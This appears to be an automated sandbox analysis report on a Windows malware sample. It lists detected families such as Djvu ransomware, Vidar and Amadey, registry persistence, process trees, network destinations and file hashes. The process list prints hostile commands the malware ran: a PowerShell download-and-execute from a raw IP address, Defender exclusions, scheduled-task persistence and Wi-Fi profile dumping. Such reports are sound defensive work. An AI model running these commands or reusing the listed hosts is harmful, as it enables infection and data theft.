Analysis Overview
SHA256
8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
Threat Level: Known bad
The file 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d was found to be: Known bad.
Malicious Activity Summary
Amadey
Detected Djvu ransomware
ZGRat
Djvu Ransomware
DcRat
Vidar
Lumma Stealer
Detect ZGRat V1
Stealc
SmokeLoader
Detect Vidar Stealer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies file permissions
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Identifies Wine through registry keys
Deletes itself
Checks BIOS information in registry
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-15 01:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 01:10
Reported
2024-03-15 01:15
Platform
win7-20240221-en
Max time kernel
300s
Max time network
301s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\6375.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
SmokeLoader
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\6375.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" | C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\463A.exe | N/A |
| File created | C:\Windows\Tasks\explorgu.job | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\D55B.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob value omitted] | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\463A.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe
"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BCBA.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f6994695-3cd8-4f33-87d3-a992b1783b4e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\6375.exe
"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\6375.exe
"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1444
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\D55B.exe
C:\Users\Admin\AppData\Local\Temp\D55B.exe
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\D80A.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 124
C:\Users\Admin\AppData\Local\Temp\F31A.exe
C:\Users\Admin\AppData\Local\Temp\F31A.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {E17D5ECB-3BDA-44A1-9410-37913DE0A1EC} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\3F18.exe
C:\Users\Admin\AppData\Local\Temp\3F18.exe
C:\Users\Admin\AppData\Local\Temp\463A.exe
C:\Users\Admin\AppData\Local\Temp\463A.exe
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\650401615101_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 208
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| MX | 187.211.202.16:80 | sdfjhuz.com | tcp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| MX | 187.211.202.16:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| MX | 187.211.202.16:80 | sajdfue.com | tcp |
| MX | 187.211.202.16:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| DE | 5.75.208.156:80 | 5.75.208.156 | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| NL | 195.20.16.82:443 | N/A | tcp |
| NL | 195.20.16.82:443 | N/A | tcp |
| US | 8.8.8.8:53 | lknusantararaya.com | udp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| US | 8.8.8.8:53 | www.upload.ee | udp |
| FR | 51.91.30.159:443 | www.upload.ee | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| US | 8.8.8.8:53 | topgamecheats.dev | udp |
| BG | 93.123.39.96:443 | topgamecheats.dev | tcp |
| NL | 193.222.96.225:80 | 193.222.96.225 | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
Files
memory/2744-3-0x0000000000400000-0x0000000000474000-memory.dmp
memory/2744-2-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/2744-1-0x00000000002D0000-0x00000000003D0000-memory.dmp
memory/1216-4-0x0000000001C50000-0x0000000001C66000-memory.dmp
memory/2744-5-0x0000000000400000-0x0000000000474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BCBA.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
C:\Users\Admin\AppData\Local\Temp\6375.exe
| MD5 | ae597691370226cc4354b9897415b115 |
| SHA1 | 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae |
| SHA256 | 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675 |
| SHA512 | f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24 |
memory/328-26-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/328-27-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/328-28-0x0000000001E30000-0x0000000001F4B000-memory.dmp
memory/2600-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2600-33-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-36-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-37-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-58-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2392-61-0x0000000000570000-0x0000000000601000-memory.dmp
memory/2392-60-0x0000000000570000-0x0000000000601000-memory.dmp
memory/1820-68-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-69-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d67fa48cf6cf5f1818b732ea24db1d6e |
| SHA1 | 44858909775b98c384307149a53b231f084427f6 |
| SHA256 | 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27 |
| SHA512 | c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | fae824a47e25a52fa87a58ea307183f0 |
| SHA1 | 167aee477372f3a380a69fc2654c64b1f5e0e5e2 |
| SHA256 | aaf7d93821170cf96ce48623dd8525d5698636dd2303f1cb8b07264c444af357 |
| SHA512 | 0989dfa40b02e98470912b189992bfea43a1e6496e03c66944006c93f254f9afc3fa09c4b8555a29d590c00813bd3d9a35dc771a3cb0207bf6a00c2e9aed7345 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 14df8e8d9da174089ed3ab7dcc22165c |
| SHA1 | a83ae80f69a2b631992a3d3951e3fccc98f0af93 |
| SHA256 | 58de7867dc0b8866736ee742b7337d70e06f19d9c8c951b600704af3abab48d4 |
| SHA512 | 8b64e00979a0e71d1432a19cb091360db405bd7fff82c3f3f21bc3471f9983d251758e6bc1735a3bf408bb5d91a015f7b1907a8bd89e939e17fbd50c382117d4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3714cad04dd89864e16db8534df25e4c |
| SHA1 | 37ba08ecf1c02bf4104585ad6f2a7ca2e7f53aed |
